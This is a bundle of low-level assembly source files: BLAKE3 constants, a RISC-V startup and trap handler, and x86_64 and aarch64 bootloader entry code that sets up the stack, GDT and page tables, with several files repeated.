ADD0:
.long 0, 1, 2, 3
ADD1:
.long 4, 4, 4, 4
BLAKE3_IV_0:
.long 0x6A09E667, 0x6A09E667, 0x6A09E667, 0x6A09E667
BLAKE3_IV_1:
.long 0xBB67AE85, 0xBB67AE85, 0xBB67AE85, 0xBB67AE85
BLAKE3_IV_2:
.long 0x3C6EF372, 0x3C6EF372, 0x3C6EF372, 0x3C6EF372
BLAKE3_IV_3:
.long 0xA54FF53A, 0xA54FF53A, 0xA54FF53A, 0xA54FF53A
BLAKE3_BLOCK_LEN:
.long 64, 64, 64, 64
CMP_MSB_MASK:
.long 0x80000000, 0x80000000, 0x80000000, 0x80000000
PBLENDW_0x33_MASK:
.long 0xFFFFFFFF, 0x00000000, 0xFFFFFFFF, 0x00000000
PBLENDW_0xCC_MASK:
.long 0x00000000, 0xFFFFFFFF, 0x00000000, 0xFFFFFFFF
PBLENDW_0x3F_MASK:
.long 0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF, 0x00000000
PBLENDW_0xC0_MASK:
.long 0x00000000, 0x00000000, 0x00000000, 0xFFFFFFFF
|
mm-zk/eravm_risc | 3,344 | asm/asm_reduced.S | /*
Entry point of all programs (_start).
It initializes DWARF call frame information, the stack pointer, the
frame pointer (needed for closures to work in start_rust) and the global
pointer. Then it calls _start_rust.
*/
.section .init, "ax"
.global _start
_start:
/* Jump to the absolute address defined by the linker script. */
// for 32bit
# lui ra, %hi(_abs_start)
# jr %lo(_abs_start)(ra)
la ra, _abs_start
jr ra
_abs_start:
.cfi_startproc
.cfi_undefined ra
.option push
.option norelax
la gp, __global_pointer$
.option pop
// Assume single core, and put SP to the very top address of the stack region
la sp, _sstack
// Set frame pointer
add s0, sp, zero
jal zero, _start_rust
.cfi_endproc
/*
Machine trap entry point (_machine_start_trap)
*/
.section .trap, "ax"
.global machine_default_start_trap
.align 4
machine_default_start_trap:
// We assume that exception stack is always saved to MSCRATCH
// so we swap it with x31
csrrw x31, mscratch, x31
// write to exception stack
# sw x31, -4(sp)
sw x30, -8(x31)
sw x29, -12(x31)
sw x28, -16(x31)
sw x27, -20(x31)
sw x26, -24(x31)
sw x25, -28(x31)
sw x24, -32(x31)
sw x23, -36(x31)
sw x22, -40(x31)
sw x21, -44(x31)
sw x20, -48(x31)
sw x19, -52(x31)
sw x18, -56(x31)
sw x17, -60(x31)
sw x16, -64(x31)
sw x15, -68(x31)
sw x14, -72(x31)
sw x13, -76(x31)
sw x12, -80(x31)
sw x11, -84(x31)
sw x10, -88(x31)
sw x9, -92(x31)
sw x8, -96(x31)
sw x7, -100(x31)
sw x6, -104(x31)
sw x5, -108(x31)
sw x4, -112(x31)
sw x3, -116(x31)
sw x2, -120(x31)
sw x1, -124(x31)
// we will not restore it, so we are ok to avoid write
# sw x0, -128(x31)
// move valid sp into a0,
mv a0, x31
csrrw x31, mscratch, x0
sw x31, -4(a0)
// restore sp
mv sp, a0
// sp is valid now
addi sp, sp, -128
// pass pointer as first argument
add a0, sp, zero
jal ra, _machine_start_trap_rust
// set return address into mepc
csrw mepc, a0
// save original SP to mscratch for now
lw a0, 8(sp) // it's original sp that we saved in the stack
csrw mscratch, a0 // save it for now
// restore everything we saved
// it's illegal instruction, so we skip. Anyway can not overwrite x0
# lw x0, 0(sp)
lw x1, 4(sp)
# lw x2, 8(sp) // do not overwrite SP yet
lw x3, 12(sp)
lw x4, 16(sp)
lw x5, 20(sp)
lw x6, 24(sp)
lw x7, 28(sp)
lw x8, 32(sp)
lw x9, 36(sp)
lw x10, 40(sp)
lw x11, 44(sp)
lw x12, 48(sp)
lw x13, 52(sp)
lw x14, 56(sp)
lw x15, 60(sp)
lw x16, 64(sp)
lw x17, 68(sp)
lw x18, 72(sp)
lw x19, 76(sp)
lw x20, 80(sp)
lw x21, 84(sp)
lw x22, 88(sp)
lw x23, 92(sp)
lw x24, 96(sp)
lw x25, 100(sp)
lw x26, 104(sp)
lw x27, 108(sp)
lw x28, 112(sp)
lw x29, 116(sp)
lw x30, 120(sp)
lw x31, 124(sp)
addi sp, sp, 128
// we popped everything from the stack
// now save current exception SP to mscratch,
// and put original SP back
csrrw sp, mscratch, sp
mret
/* Make sure there is an abort when linking */
.section .text.abort
.globl abort
abort:
j abort |
moehr1z/loader | 5,267 | src/arch/x86_64/entry_fc.s | # This is the kernel's entry point, if Hermit is running with
# FireCracker. FireCracker assumes a 64 bit Linux kernel.
.code32
.set BOOT_STACK_SIZE, 4096
.extern loader_start # defined in linker script
.extern loader_end
.section .mboot, "a"
.align 8
.align 4
# we need already a valid GDT to switch in the 64bit modus
GDT64: # Global Descriptor Table (64-bit).
.set GDT64.Null, . - GDT64 # The null descriptor.
.2byte 0 # Limit (low).
.2byte 0 # Base (low).
.byte 0 # Base (middle)
.byte 0 # Access.
.byte 0 # Granularity.
.byte 0 # Base (high).
.set GDT64.Code, . - GDT64 # The code descriptor.
.2byte 0 # Limit (low).
.2byte 0 # Base (low).
.byte 0 # Base (middle)
.byte 0b10011010 # Access.
.byte 0b00100000 # Granularity.
.byte 0 # Base (high).
.set GDT64.Data, . - GDT64 # The data descriptor.
.2byte 0 # Limit (low).
.2byte 0 # Base (low).
.byte 0 # Base (middle)
.byte 0b10010010 # Access.
.byte 0b00000000 # Granularity.
.byte 0 # Base (high).
GDT64.Pointer: # The GDT-pointer.
.2byte . - GDT64 - 1 # Limit.
.8byte GDT64 # Base.
.section .text
.align 4
.global _start
_start:
cli # avoid any interrupt
# Initialize stack pointer
mov esp, OFFSET boot_stack
add esp, BOOT_STACK_SIZE - 16
mov [boot_params], esi
# This will set up the x86 control registers:
# Caching and the floating point unit are enabled
# Bootstrap page tables are loaded and page size
# extensions (huge pages) enabled.
cpu_init:
# initialize page tables
# map kernel 1:1
push edi
push ebx
push ecx
mov ecx, OFFSET loader_start
mov ebx, OFFSET loader_end
add ebx, 0x1000
L0: cmp ecx, ebx
jae L1
mov eax, ecx
and eax, 0xFFFFF000 # page align lower half
mov edi, eax
shr edi, 9 # (edi >> 12) * 8 (index for boot_pgt)
add edi, OFFSET boot_pgt1
or eax, 0x3 # set present and writable bits
mov [edi], eax
add ecx, 0x1000
jmp L0
L1:
pop ecx
pop ebx
pop edi
# check for long mode
# do we have the instruction cpuid?
pushfd
pop eax
mov ecx, eax
xor eax, 1 << 21
push eax
popfd
pushfd
pop eax
push ecx
popfd
xor eax, ecx
jz Linvalid
# cpuid > 0x80000000?
mov eax, 0x80000000
cpuid
cmp eax, 0x80000001
jb Linvalid # It is less, there is no long mode.
# do we have a long mode?
mov eax, 0x80000001
cpuid
test edx, 1 << 29 # Test if the LM-bit, which is bit 29, is set in the D-register.
jz Linvalid # They aren't, there is no long mode.
# Set CR3
mov eax, OFFSET boot_pml4
# or eax, (1 << 0) # set present bit
mov cr3, eax
# we need to enable PAE modus
mov eax, cr4
or eax, 1 << 5
mov cr4, eax
# switch to the compatibility mode (which is part of long mode)
mov ecx, 0xC0000080
rdmsr
or eax, 1 << 8
wrmsr
# Set CR4
mov eax, cr4
and eax, 0xfffbf9ff # disable SSE
# or eax, (1 << 7) # enable PGE
mov cr4, eax
# Set CR0 (PM-bit is already set)
mov eax, cr0
and eax, ~(1 << 2) # disable FPU emulation
or eax, (1 << 1) # enable FPU montitoring
and eax, ~(1 << 30) # enable caching
and eax, ~(1 << 29) # disable write through caching
and eax, ~(1 << 16) # allow kernel write access to read-only pages
or eax, (1 << 31) # enable paging
mov cr0, eax
lgdt [GDT64.Pointer] # Load the 64-bit global descriptor table.
# https://github.com/llvm/llvm-project/issues/46048
.att_syntax prefix
# Set the code segment and enter 64-bit long mode.
ljmp $GDT64.Code, $start64
.intel_syntax noprefix
# there is no long mode
Linvalid:
jmp Linvalid
.code64
start64:
# initialize segment registers
mov ax, OFFSET GDT64.Data
mov ds, eax
mov es, eax
mov ss, eax
xor ax, ax
mov fs, eax
mov gs, eax
cld
# set default stack pointer
movabs rsp, OFFSET boot_stack
add rsp, BOOT_STACK_SIZE-16
# jump to the boot processors's C code
.extern loader_main
jmp loader_main
jmp start64+0x28
.section .data
.global mb_info
.align 8
mb_info:
.8byte 0
.global boot_params
.align 8
boot_params:
.8byte 0
.align 4096
.global boot_stack
boot_stack:
.fill BOOT_STACK_SIZE, 1, 0xcd
# Bootstrap page tables are used during the initialization.
.align 4096
boot_pml4:
.8byte boot_pdpt + 0x3 # PG_PRESENT | PG_RW
.fill 510, 8, 0 # PAGE_MAP_ENTRIES - 2
.8byte boot_pml4 + 0x3 # PG_PRESENT | PG_RW
boot_pdpt:
.8byte boot_pgd + 0x3 # PG_PRESENT | PG_RW
.fill 511, 8, 0 # PAGE_MAP_ENTRIES - 1
boot_pgd:
.8byte boot_pgt1 + 0x3 # PG_PRESENT | PG_RW
.8byte boot_pgt2 + 0x3 # PG_PRESENT | PG_RW
.fill 510, 8, 0 # PAGE_MAP_ENTRIES - 1
boot_pgt1:
.fill 512, 8, 0
boot_pgt2:
.fill 512, 8, 0
|
moehr1z/loader | 6,171 | src/arch/x86_64/entry.s | # This is the kernel's entry point. We could either call main here,
# or we can use this to setup the stack or other nice stuff, like
# perhaps setting up the GDT and segments. Please note that interrupts
# are disabled at this point: More on interrupts later!
.code32
.set BOOT_STACK_SIZE, 4096
.extern loader_start # defined in linker script
.extern loader_end
# We use a special name to map this section at the begin of our kernel
# => Multiboot expects its magic number at the beginning of the kernel.
.section .mboot, "a"
# This part MUST be 4 byte aligned, so we solve that issue using '.align 4'.
.align 4
mboot:
# Multiboot macros to make a few lines more readable later
.set MULTIBOOT_PAGE_ALIGN, (1 << 0)
.set MULTIBOOT_MEMORY_INFO, (1 << 1)
.set MULTIBOOT_HEADER_MAGIC, 0x1BADB002
.set MULTIBOOT_HEADER_FLAGS, MULTIBOOT_PAGE_ALIGN | MULTIBOOT_MEMORY_INFO
.set MULTIBOOT_CHECKSUM, -(MULTIBOOT_HEADER_MAGIC + MULTIBOOT_HEADER_FLAGS)
# This is the GRUB Multiboot header. A boot signature
.4byte MULTIBOOT_HEADER_MAGIC
.4byte MULTIBOOT_HEADER_FLAGS
.4byte MULTIBOOT_CHECKSUM
.4byte 0, 0, 0, 0, 0 # address fields
.align 4
# we need already a valid GDT to switch in the 64bit modus
GDT64: # Global Descriptor Table (64-bit).
.set GDT64.Null, . - GDT64 # The null descriptor.
.2byte 0 # Limit (low).
.2byte 0 # Base (low).
.byte 0 # Base (middle)
.byte 0 # Access.
.byte 0 # Granularity.
.byte 0 # Base (high).
.set GDT64.Code, . - GDT64 # The code descriptor.
.2byte 0 # Limit (low).
.2byte 0 # Base (low).
.byte 0 # Base (middle)
.byte 0b10011010 # Access.
.byte 0b00100000 # Granularity.
.byte 0 # Base (high).
.set GDT64.Data, . - GDT64 # The data descriptor.
.2byte 0 # Limit (low).
.2byte 0 # Base (low).
.byte 0 # Base (middle)
.byte 0b10010010 # Access.
.byte 0b00000000 # Granularity.
.byte 0 # Base (high).
GDT64.Pointer: # The GDT-pointer.
.2byte . - GDT64 - 1 # Limit.
.8byte GDT64 # Base.
.section .text
.align 4
.global _start
_start:
cli # avoid any interrupt
# Initialize stack pointer
mov esp, OFFSET boot_stack
add esp, BOOT_STACK_SIZE - 16
# Interpret multiboot information
mov [mb_info], ebx
# This will set up the x86 control registers:
# Caching and the floating point unit are enabled
# Bootstrap page tables are loaded and page size
# extensions (huge pages) enabled.
cpu_init:
# initialize page tables
# map kernel 1:1
push edi
push ebx
push ecx
mov ecx, OFFSET loader_start
mov ebx, OFFSET loader_end
add ebx, 0x1000
L0: cmp ecx, ebx
jae L1
mov eax, ecx
and eax, 0xFFFFF000 # page align lower half
mov edi, eax
shr edi, 9 # (edi >> 12) * 8 (index for boot_pgt)
add edi, OFFSET boot_pgt1
or eax, 0x3 # set present and writable bits
mov [edi], eax
add ecx, 0x1000
jmp L0
L1:
pop ecx
pop ebx
pop edi
# check for long mode
# do we have the instruction cpuid?
pushfd
pop eax
mov ecx, eax
xor eax, 1 << 21
push eax
popfd
pushfd
pop eax
push ecx
popfd
xor eax, ecx
jz Linvalid
# cpuid > 0x80000000?
mov eax, 0x80000000
cpuid
cmp eax, 0x80000001
jb Linvalid # It is less, there is no long mode.
# do we have a long mode?
mov eax, 0x80000001
cpuid
test edx, 1 << 29 # Test if the LM-bit, which is bit 29, is set in the D-register.
jz Linvalid # They aren't, there is no long mode.
# Set CR3
mov eax, OFFSET boot_pml4
# or eax, (1 << 0) # set present bit
mov cr3, eax
# we need to enable PAE modus
mov eax, cr4
or eax, 1 << 5
mov cr4, eax
# switch to the compatibility mode (which is part of long mode)
mov ecx, 0xC0000080
rdmsr
or eax, 1 << 8
wrmsr
# Set CR4
mov eax, cr4
and eax, 0xfffbf9ff # disable SSE
# or eax, (1 << 7) # enable PGE
mov cr4, eax
# Set CR0 (PM-bit is already set)
mov eax, cr0
and eax, ~(1 << 2) # disable FPU emulation
or eax, (1 << 1) # enable FPU montitoring
and eax, ~(1 << 30) # enable caching
and eax, ~(1 << 29) # disable write through caching
and eax, ~(1 << 16) # allow kernel write access to read-only pages
or eax, (1 << 31) # enable paging
mov cr0, eax
lgdt [GDT64.Pointer] # Load the 64-bit global descriptor table.
# https://github.com/llvm/llvm-project/issues/46048
.att_syntax prefix
# Set the code segment and enter 64-bit long mode.
ljmp $GDT64.Code, $start64
.intel_syntax noprefix
# there is no long mode
Linvalid:
jmp Linvalid
.code64
start64:
# initialize segment registers
mov ax, OFFSET GDT64.Data
mov ds, eax
mov es, eax
mov ss, eax
xor ax, ax
mov fs, eax
mov gs, eax
cld
# set default stack pointer
movabs rsp, OFFSET boot_stack
add rsp, BOOT_STACK_SIZE-16
# jump to the boot processors's C code
.extern loader_main
jmp loader_main
jmp start64+0x28
.section .data
.global mb_info
.align 8
mb_info:
.8byte 0
.align 4096
.global boot_stack
boot_stack:
.fill BOOT_STACK_SIZE, 1, 0xcd
# Bootstrap page tables are used during the initialization.
.align 4096
boot_pml4:
.8byte boot_pdpt + 0x3 # PG_PRESENT | PG_RW
.fill 510, 8, 0 # PAGE_MAP_ENTRIES - 2
.8byte boot_pml4 + 0x3 # PG_PRESENT | PG_RW
boot_pdpt:
.8byte boot_pgd + 0x3 # PG_PRESENT | PG_RW
.fill 511, 8, 0 # PAGE_MAP_ENTRIES - 1
boot_pgd:
.8byte boot_pgt1 + 0x3 # PG_PRESENT | PG_RW
.8byte boot_pgt2 + 0x3 # PG_PRESENT | PG_RW
.fill 510, 8, 0 # PAGE_MAP_ENTRIES - 1
boot_pgt1:
.fill 512, 8, 0
boot_pgt2:
.fill 512, 8, 0
|
moehr1z/loader | 1,619 | src/arch/aarch64/entry.s | // Adapted from https://github.com/rust-embedded/rust-raspberrypi-OS-tutorials/blob/master/02_runtime_init/src/_arch/aarch64/cpu/boot.s
.equ _core_id_mask, 0xff
.section .text._start
_start:
// Only proceed on the boot core. Park it otherwise.
mrs x1, mpidr_el1
and x1, x1, _core_id_mask
mov x2, xzr // Assume CPU 0 is responsible for booting
cmp x1, x2
b.ne 1f
// If execution reaches here, it is the boot core. Now, prepare the jump to Rust code.
// This loads the physical address of the stack end. For details see
// https://github.com/rust-embedded/rust-raspberrypi-OS-tutorials/blob/master/16_virtual_mem_part4_higher_half_kernel/src/bsp/raspberrypi/link.ld
adrp x4, __boot_core_stack_end_exclusive
add x4, x4, #:lo12:__boot_core_stack_end_exclusive
mov sp, x4
// Jump to Rust code.
b _start_rust
// Infinitely wait for events (aka "park the core").
1: wfe
b 1b
.size _start, . - _start
.type _start, function
.global _start
.section .bss
.global l0_pgtable
.global l1_pgtable
.global l2_pgtable
.global l2k_pgtable
.global l3_pgtable
.global L0mib_pgtable
.align 12
l0_pgtable:
.space 512*8, 0
l1_pgtable:
.space 512*8, 0
l2_pgtable:
.space 512*8, 0
l2k_pgtable:
.space 512*8, 0
l3_pgtable:
.space 512*8, 0
L0mib_pgtable:
.space 512*8, 0
L2mib_pgtable:
.space 512*8, 0
L4mib_pgtable:
.space 512*8, 0
L6mib_pgtable:
.space 512*8, 0
L8mib_pgtable:
.space 512*8, 0
L10mib_pgtable:
.space 512*8, 0
L12mib_pgtable:
.space 512*8, 0
L14mib_pgtable:
.space 512*8, 0
L16mib_pgtable:
.space 512*8, 0
L18mib_pgtable:
.space 512*8, 0 |
mm-zk/eravm_risc | 3,344 | asm/asm_reduced.S | /*
Entry point of all programs (_start).
It initializes DWARF call frame information, the stack pointer, the
frame pointer (needed for closures to work in start_rust) and the global
pointer. Then it calls _start_rust.
*/
.section .init, "ax"
.global _start
_start:
/* Jump to the absolute address defined by the linker script. */
// for 32bit
# lui ra, %hi(_abs_start)
# jr %lo(_abs_start)(ra)
la ra, _abs_start
jr ra
_abs_start:
.cfi_startproc
.cfi_undefined ra
.option push
.option norelax
la gp, __global_pointer$
.option pop
// Assume single core, and put SP to the very top address of the stack region
la sp, _sstack
// Set frame pointer
add s0, sp, zero
jal zero, _start_rust
.cfi_endproc
/*
Machine trap entry point (_machine_start_trap)
*/
.section .trap, "ax"
.global machine_default_start_trap
.align 4
machine_default_start_trap:
// We assume that exception stack is always saved to MSCRATCH
// so we swap it with x31
csrrw x31, mscratch, x31
// write to exception stack
# sw x31, -4(sp)
sw x30, -8(x31)
sw x29, -12(x31)
sw x28, -16(x31)
sw x27, -20(x31)
sw x26, -24(x31)
sw x25, -28(x31)
sw x24, -32(x31)
sw x23, -36(x31)
sw x22, -40(x31)
sw x21, -44(x31)
sw x20, -48(x31)
sw x19, -52(x31)
sw x18, -56(x31)
sw x17, -60(x31)
sw x16, -64(x31)
sw x15, -68(x31)
sw x14, -72(x31)
sw x13, -76(x31)
sw x12, -80(x31)
sw x11, -84(x31)
sw x10, -88(x31)
sw x9, -92(x31)
sw x8, -96(x31)
sw x7, -100(x31)
sw x6, -104(x31)
sw x5, -108(x31)
sw x4, -112(x31)
sw x3, -116(x31)
sw x2, -120(x31)
sw x1, -124(x31)
// we will not restore it, so we are ok to avoid write
# sw x0, -128(x31)
// move valid sp into a0,
mv a0, x31
csrrw x31, mscratch, x0
sw x31, -4(a0)
// restore sp
mv sp, a0
// sp is valid now
addi sp, sp, -128
// pass pointer as first argument
add a0, sp, zero
jal ra, _machine_start_trap_rust
// set return address into mepc
csrw mepc, a0
// save original SP to mscratch for now
lw a0, 8(sp) // it's original sp that we saved in the stack
csrw mscratch, a0 // save it for now
// restore everything we saved
// it's illegal instruction, so we skip. Anyway can not overwrite x0
# lw x0, 0(sp)
lw x1, 4(sp)
# lw x2, 8(sp) // do not overwrite SP yet
lw x3, 12(sp)
lw x4, 16(sp)
lw x5, 20(sp)
lw x6, 24(sp)
lw x7, 28(sp)
lw x8, 32(sp)
lw x9, 36(sp)
lw x10, 40(sp)
lw x11, 44(sp)
lw x12, 48(sp)
lw x13, 52(sp)
lw x14, 56(sp)
lw x15, 60(sp)
lw x16, 64(sp)
lw x17, 68(sp)
lw x18, 72(sp)
lw x19, 76(sp)
lw x20, 80(sp)
lw x21, 84(sp)
lw x22, 88(sp)
lw x23, 92(sp)
lw x24, 96(sp)
lw x25, 100(sp)
lw x26, 104(sp)
lw x27, 108(sp)
lw x28, 112(sp)
lw x29, 116(sp)
lw x30, 120(sp)
lw x31, 124(sp)
addi sp, sp, 128
// we popped everything from the stack
// now save current exception SP to mscratch,
// and put original SP back
csrrw sp, mscratch, sp
mret
/* Make sure there is an abort when linking */
.section .text.abort
.globl abort
abort:
j abort |
moehr1z/loader | 5,267 | src/arch/x86_64/entry_fc.s | # This is the kernel's entry point, if Hermit is running with
# FireCracker. FireCracker assumes a 64 bit Linux kernel.
.code32
.set BOOT_STACK_SIZE, 4096
.extern loader_start # defined in linker script
.extern loader_end
.section .mboot, "a"
.align 8
.align 4
# we need already a valid GDT to switch in the 64bit modus
GDT64: # Global Descriptor Table (64-bit).
.set GDT64.Null, . - GDT64 # The null descriptor.
.2byte 0 # Limit (low).
.2byte 0 # Base (low).
.byte 0 # Base (middle)
.byte 0 # Access.
.byte 0 # Granularity.
.byte 0 # Base (high).
.set GDT64.Code, . - GDT64 # The code descriptor.
.2byte 0 # Limit (low).
.2byte 0 # Base (low).
.byte 0 # Base (middle)
.byte 0b10011010 # Access.
.byte 0b00100000 # Granularity.
.byte 0 # Base (high).
.set GDT64.Data, . - GDT64 # The data descriptor.
.2byte 0 # Limit (low).
.2byte 0 # Base (low).
.byte 0 # Base (middle)
.byte 0b10010010 # Access.
.byte 0b00000000 # Granularity.
.byte 0 # Base (high).
GDT64.Pointer: # The GDT-pointer.
.2byte . - GDT64 - 1 # Limit.
.8byte GDT64 # Base.
.section .text
.align 4
.global _start
_start:
cli # avoid any interrupt
# Initialize stack pointer
mov esp, OFFSET boot_stack
add esp, BOOT_STACK_SIZE - 16
mov [boot_params], esi
# This will set up the x86 control registers:
# Caching and the floating point unit are enabled
# Bootstrap page tables are loaded and page size
# extensions (huge pages) enabled.
cpu_init:
# initialize page tables
# map kernel 1:1
push edi
push ebx
push ecx
mov ecx, OFFSET loader_start
mov ebx, OFFSET loader_end
add ebx, 0x1000
L0: cmp ecx, ebx
jae L1
mov eax, ecx
and eax, 0xFFFFF000 # page align lower half
mov edi, eax
shr edi, 9 # (edi >> 12) * 8 (index for boot_pgt)
add edi, OFFSET boot_pgt1
or eax, 0x3 # set present and writable bits
mov [edi], eax
add ecx, 0x1000
jmp L0
L1:
pop ecx
pop ebx
pop edi
# check for long mode
# do we have the instruction cpuid?
pushfd
pop eax
mov ecx, eax
xor eax, 1 << 21
push eax
popfd
pushfd
pop eax
push ecx
popfd
xor eax, ecx
jz Linvalid
# cpuid > 0x80000000?
mov eax, 0x80000000
cpuid
cmp eax, 0x80000001
jb Linvalid # It is less, there is no long mode.
# do we have a long mode?
mov eax, 0x80000001
cpuid
test edx, 1 << 29 # Test if the LM-bit, which is bit 29, is set in the D-register.
jz Linvalid # They aren't, there is no long mode.
# Set CR3
mov eax, OFFSET boot_pml4
# or eax, (1 << 0) # set present bit
mov cr3, eax
# we need to enable PAE modus
mov eax, cr4
or eax, 1 << 5
mov cr4, eax
# switch to the compatibility mode (which is part of long mode)
mov ecx, 0xC0000080
rdmsr
or eax, 1 << 8
wrmsr
# Set CR4
mov eax, cr4
and eax, 0xfffbf9ff # disable SSE
# or eax, (1 << 7) # enable PGE
mov cr4, eax
# Set CR0 (PM-bit is already set)
mov eax, cr0
and eax, ~(1 << 2) # disable FPU emulation
or eax, (1 << 1) # enable FPU montitoring
and eax, ~(1 << 30) # enable caching
and eax, ~(1 << 29) # disable write through caching
and eax, ~(1 << 16) # allow kernel write access to read-only pages
or eax, (1 << 31) # enable paging
mov cr0, eax
lgdt [GDT64.Pointer] # Load the 64-bit global descriptor table.
# https://github.com/llvm/llvm-project/issues/46048
.att_syntax prefix
# Set the code segment and enter 64-bit long mode.
ljmp $GDT64.Code, $start64
.intel_syntax noprefix
# there is no long mode
Linvalid:
jmp Linvalid
.code64
start64:
# initialize segment registers
mov ax, OFFSET GDT64.Data
mov ds, eax
mov es, eax
mov ss, eax
xor ax, ax
mov fs, eax
mov gs, eax
cld
# set default stack pointer
movabs rsp, OFFSET boot_stack
add rsp, BOOT_STACK_SIZE-16
# jump to the boot processors's C code
.extern loader_main
jmp loader_main
jmp start64+0x28
.section .data
.global mb_info
.align 8
mb_info:
.8byte 0
.global boot_params
.align 8
boot_params:
.8byte 0
.align 4096
.global boot_stack
boot_stack:
.fill BOOT_STACK_SIZE, 1, 0xcd
# Bootstrap page tables are used during the initialization.
.align 4096
boot_pml4:
.8byte boot_pdpt + 0x3 # PG_PRESENT | PG_RW
.fill 510, 8, 0 # PAGE_MAP_ENTRIES - 2
.8byte boot_pml4 + 0x3 # PG_PRESENT | PG_RW
boot_pdpt:
.8byte boot_pgd + 0x3 # PG_PRESENT | PG_RW
.fill 511, 8, 0 # PAGE_MAP_ENTRIES - 1
boot_pgd:
.8byte boot_pgt1 + 0x3 # PG_PRESENT | PG_RW
.8byte boot_pgt2 + 0x3 # PG_PRESENT | PG_RW
.fill 510, 8, 0 # PAGE_MAP_ENTRIES - 1
boot_pgt1:
.fill 512, 8, 0
boot_pgt2:
.fill 512, 8, 0
|
moehr1z/loader | 6,171 | src/arch/x86_64/entry.s | # This is the kernel's entry point. We could either call main here,
# or we can use this to setup the stack or other nice stuff, like
# perhaps setting up the GDT and segments. Please note that interrupts
# are disabled at this point: More on interrupts later!
.code32
.set BOOT_STACK_SIZE, 4096
.extern loader_start # defined in linker script
.extern loader_end
# We use a special name to map this section at the begin of our kernel
# => Multiboot expects its magic number at the beginning of the kernel.
.section .mboot, "a"
# This part MUST be 4 byte aligned, so we solve that issue using '.align 4'.
.align 4
mboot:
# Multiboot macros to make a few lines more readable later
.set MULTIBOOT_PAGE_ALIGN, (1 << 0)
.set MULTIBOOT_MEMORY_INFO, (1 << 1)
.set MULTIBOOT_HEADER_MAGIC, 0x1BADB002
.set MULTIBOOT_HEADER_FLAGS, MULTIBOOT_PAGE_ALIGN | MULTIBOOT_MEMORY_INFO
.set MULTIBOOT_CHECKSUM, -(MULTIBOOT_HEADER_MAGIC + MULTIBOOT_HEADER_FLAGS)
# This is the GRUB Multiboot header. A boot signature
.4byte MULTIBOOT_HEADER_MAGIC
.4byte MULTIBOOT_HEADER_FLAGS
.4byte MULTIBOOT_CHECKSUM
.4byte 0, 0, 0, 0, 0 # address fields
.align 4
# we need already a valid GDT to switch in the 64bit modus
GDT64: # Global Descriptor Table (64-bit).
.set GDT64.Null, . - GDT64 # The null descriptor.
.2byte 0 # Limit (low).
.2byte 0 # Base (low).
.byte 0 # Base (middle)
.byte 0 # Access.
.byte 0 # Granularity.
.byte 0 # Base (high).
.set GDT64.Code, . - GDT64 # The code descriptor.
.2byte 0 # Limit (low).
.2byte 0 # Base (low).
.byte 0 # Base (middle)
.byte 0b10011010 # Access.
.byte 0b00100000 # Granularity.
.byte 0 # Base (high).
.set GDT64.Data, . - GDT64 # The data descriptor.
.2byte 0 # Limit (low).
.2byte 0 # Base (low).
.byte 0 # Base (middle)
.byte 0b10010010 # Access.
.byte 0b00000000 # Granularity.
.byte 0 # Base (high).
GDT64.Pointer: # The GDT-pointer.
.2byte . - GDT64 - 1 # Limit.
.8byte GDT64 # Base.
.section .text
.align 4
.global _start
_start:
cli # avoid any interrupt
# Initialize stack pointer
mov esp, OFFSET boot_stack
add esp, BOOT_STACK_SIZE - 16
# Interpret multiboot information
mov [mb_info], ebx
# This will set up the x86 control registers:
# Caching and the floating point unit are enabled
# Bootstrap page tables are loaded and page size
# extensions (huge pages) enabled.
cpu_init:
# initialize page tables
# map kernel 1:1
push edi
push ebx
push ecx
mov ecx, OFFSET loader_start
mov ebx, OFFSET loader_end
add ebx, 0x1000
L0: cmp ecx, ebx
jae L1
mov eax, ecx
and eax, 0xFFFFF000 # page align lower half
mov edi, eax
shr edi, 9 # (edi >> 12) * 8 (index for boot_pgt)
add edi, OFFSET boot_pgt1
or eax, 0x3 # set present and writable bits
mov [edi], eax
add ecx, 0x1000
jmp L0
L1:
pop ecx
pop ebx
pop edi
# check for long mode
# do we have the instruction cpuid?
pushfd
pop eax
mov ecx, eax
xor eax, 1 << 21
push eax
popfd
pushfd
pop eax
push ecx
popfd
xor eax, ecx
jz Linvalid
# cpuid > 0x80000000?
mov eax, 0x80000000
cpuid
cmp eax, 0x80000001
jb Linvalid # It is less, there is no long mode.
# do we have a long mode?
mov eax, 0x80000001
cpuid
test edx, 1 << 29 # Test if the LM-bit, which is bit 29, is set in the D-register.
jz Linvalid # They aren't, there is no long mode.
# Set CR3
mov eax, OFFSET boot_pml4
# or eax, (1 << 0) # set present bit
mov cr3, eax
# we need to enable PAE modus
mov eax, cr4
or eax, 1 << 5
mov cr4, eax
# switch to the compatibility mode (which is part of long mode)
mov ecx, 0xC0000080
rdmsr
or eax, 1 << 8
wrmsr
# Set CR4
mov eax, cr4
and eax, 0xfffbf9ff # disable SSE
# or eax, (1 << 7) # enable PGE
mov cr4, eax
# Set CR0 (PM-bit is already set)
mov eax, cr0
and eax, ~(1 << 2) # disable FPU emulation
or eax, (1 << 1) # enable FPU montitoring
and eax, ~(1 << 30) # enable caching
and eax, ~(1 << 29) # disable write through caching
and eax, ~(1 << 16) # allow kernel write access to read-only pages
or eax, (1 << 31) # enable paging
mov cr0, eax
lgdt [GDT64.Pointer] # Load the 64-bit global descriptor table.
# https://github.com/llvm/llvm-project/issues/46048
.att_syntax prefix
# Set the code segment and enter 64-bit long mode.
ljmp $GDT64.Code, $start64
.intel_syntax noprefix
# there is no long mode
Linvalid:
jmp Linvalid
.code64
start64:
# initialize segment registers
mov ax, OFFSET GDT64.Data
mov ds, eax
mov es, eax
mov ss, eax
xor ax, ax
mov fs, eax
mov gs, eax
cld
# set default stack pointer
movabs rsp, OFFSET boot_stack
add rsp, BOOT_STACK_SIZE-16
# jump to the boot processors's C code
.extern loader_main
jmp loader_main
jmp start64+0x28
.section .data
.global mb_info
.align 8
mb_info:
.8byte 0
.align 4096
.global boot_stack
boot_stack:
.fill BOOT_STACK_SIZE, 1, 0xcd
# Bootstrap page tables are used during the initialization.
.align 4096
boot_pml4:
.8byte boot_pdpt + 0x3 # PG_PRESENT | PG_RW
.fill 510, 8, 0 # PAGE_MAP_ENTRIES - 2
.8byte boot_pml4 + 0x3 # PG_PRESENT | PG_RW
boot_pdpt:
.8byte boot_pgd + 0x3 # PG_PRESENT | PG_RW
.fill 511, 8, 0 # PAGE_MAP_ENTRIES - 1
boot_pgd:
.8byte boot_pgt1 + 0x3 # PG_PRESENT | PG_RW
.8byte boot_pgt2 + 0x3 # PG_PRESENT | PG_RW
.fill 510, 8, 0 # PAGE_MAP_ENTRIES - 1
boot_pgt1:
.fill 512, 8, 0
